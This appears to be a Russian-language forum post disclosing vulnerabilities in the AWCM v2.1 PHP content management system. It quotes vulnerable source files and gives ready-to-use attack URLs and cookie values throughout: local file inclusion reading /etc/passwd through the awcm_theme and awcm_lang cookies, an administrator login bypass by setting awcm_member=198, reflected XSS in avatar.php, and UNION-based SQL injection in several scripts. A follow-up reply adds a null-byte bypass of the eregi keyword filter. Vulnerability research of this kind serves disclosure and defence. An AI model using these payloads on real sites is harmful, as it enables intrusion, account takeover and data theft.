cms awcm v2_1 final
http://sourceforge.net/projects/awcm/
header.php
PHP код:
if(isset($_GET['id'])) {
$gid = $_GET['id'];
if(!is_numeric($gid) OR $gid == "") { exit; }
}
if(isset($_GET['pm'])) {
$gpm = $_GET['pm'];
if(eregi("'",$gpm) OR eregi("SELECT",$gpm) OR eregi("union",$gpm) OR eregi("delete",$gpm) OR eregi("table",$gpm) OR eregi("member",$gpm) OR eregi("update",$gpm) OR eregi('admin',$gpm) OR $gpm == "") { exit; }
}
if(isset($_GET['search'])) {
$gsearch = $_GET['search'];
if(eregi("'",$gsearch)) { exit; }
}
....
if(isset($_COOKIE['awcm_theme'])) {
$theme_file = $_COOKIE['awcm_theme'];
} else {
$theme_file = $mysql_maininfo_row['defult_theme'];
}
if(isset($_COOKIE['awcm_lang'])) {
$lang_file = $_COOKIE['awcm_lang'];
} else {
$lang_file = $mysql_maininfo_row['defult_language'];
}
@include ("themes/$theme_file/settings.php");
include ("common.php");
@include ("languages/$lang_file");
$member_cok = $_COOKIE['awcm_member']-197;
if(isset($_SESSION['awcm_member'])) {
$member = $_SESSION['awcm_member'];
} elseif (isset($_COOKIE['awcm_member'])) {
$mysql_checkdookie51_member_query = mysql_query("SELECT password,id FROM awcm_members WHERE id = '$member_cok'");
$mysql_checkdookie51_member_row = mysql_fetch_array($mysql_checkdookie51_member_query);
$mysql_checkdookie51_member_total = mysql_num_rows($mysql_checkdookie51_member_query);
if ($mysql_checkdookie51_member_total > 0) {
$member = $mysql_checkdookie51_member_row['id'];
$_SESSION['awcm_member'] = $mysql_checkdookie51_member_row['id'];
}
} else {
$member = 'no';
}
LFI
mq=off
http://localhost/awcm/header.php
cookies
awcm_theme=../../../../../../../../etc/passwd%00
LFI
http://localhost/awcm/header.php
cookies
awcm_lang=../../../../../../../../etc/passwd
Заходим админом
http://localhost/awcm/index.php
cookies
awcm_member=198
-----------------------
include/avatar.php
PHP код:
include ("../connect.php");
$gh = $_GET['h'];
$gw = $_GET['w'];
$gid = $_GET['id'];
$mysql_query = mysql_query("SELECT id,avatar FROM awcm_members WHERE id = '$gid'");
$mysql_total = mysql_num_rows($mysql_query);
$mysql_row = mysql_fetch_array($mysql_query);
if($mysql_total == 1) {
if($mysql_row['avatar'] == "") {
print '<img src="../images/no_avatar.jpg" height="'.$gh.'" width="'.$gw.'" />';
} else {
print '<img src="'.$mysql_row['avatar'].'" height="'.$gh.'" width="'.$gw.'" />';
}
} else {
print '<img src="../images/no_avatar.jpg" height="'.$gh.'" width="'.$gw.'" />';
}
Passive XSS
mq=off
http://localhost/awcm/includes/avatar.php?h=1>"><SCRiPt>alert(1212);</SCRiPt>
http://localhost/awcm/includes/avatar.php?w=1>"><SCRiPt>alert(1212);</SCRiPt>
SQL
mq=off
http://localhost/awcm/includes/avatar.php?id=1'+and+1=2+union+select+1,version()+--+
-----------------------
includes/show_vid_title.php
PHP код:
include ("../connect.php");
$gid = $_GET['id'];
$mysql_show_vid_title_php_query = mysql_query("SELECT id,title FROM awcm_videos_videos WHERE id = '$gid'");
$mysql_show_vid_title_php_row = mysql_fetch_array($mysql_show_vid_title_php_query);
print $mysql_show_vid_title_php_row['title'];
SQL
mq=off
http://localhost/awcm/includes/show_vid_title.php?id=-1'+union+select+1,version()+--+
===============
RulleR
а через параметры 'pm' и 'search' нельзя провести инъекцию? вижу функцию eregi(), а она воспринимает null byte за конец строки...
можно
member_cp_pm.php
PHP код:
include ("header.php");
...
if(isset($_GET['pm'])) {
$mysql_mmbrcppmviewpmpg_query = mysql_query("SELECT * FROM awcm_member_pms WHERE hash = '$_GET[pm]' AND reciever = '$member' OR hash = '$_GET[pm]' AND sender = '$member'");
SQL
mq=off
http://localhost/awcm/member_cp_pm.php?pm=%00'+union+select+1,2,3,versio n(),5,6,7;+--+